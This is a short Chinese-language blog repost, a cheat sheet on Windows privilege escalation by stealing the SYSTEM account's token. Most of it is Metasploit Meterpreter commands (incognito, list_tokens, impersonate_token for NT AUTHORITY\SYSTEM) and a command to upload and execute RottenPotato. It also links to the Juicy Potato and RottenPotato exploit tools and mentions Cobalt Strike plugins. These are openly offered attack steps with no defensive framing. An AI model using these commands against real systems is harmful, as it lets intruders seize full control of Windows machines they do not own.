提權 令牌竊取:竊取system用戶的權限,注入system權限的行程
#msf自帶模塊竊取
#爛土豆及升級版
#相關操作命令
use incognito //列舉有哪些用戶的行程,一般有用戶和system用戶
list_tokens -u
execute -cH -f ./rottenpotato.exe //上傳rottenpotato.exe并執行提權
msf 一條命令竊取system用戶:(有時候不頂用)
impersonate_token “NT AUTHORITY\\SYSTEM”
cs也有提權的插件
https://github.com/ohpe/juicy-potato //2019出的,這個提權工具比較新,好用
https://github.com/foxglovesec/RottenPotato
https://github.com/breenmachine/RottenPotatoNG
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/89003.html
標籤:其他
上一篇:MSF基礎與應用
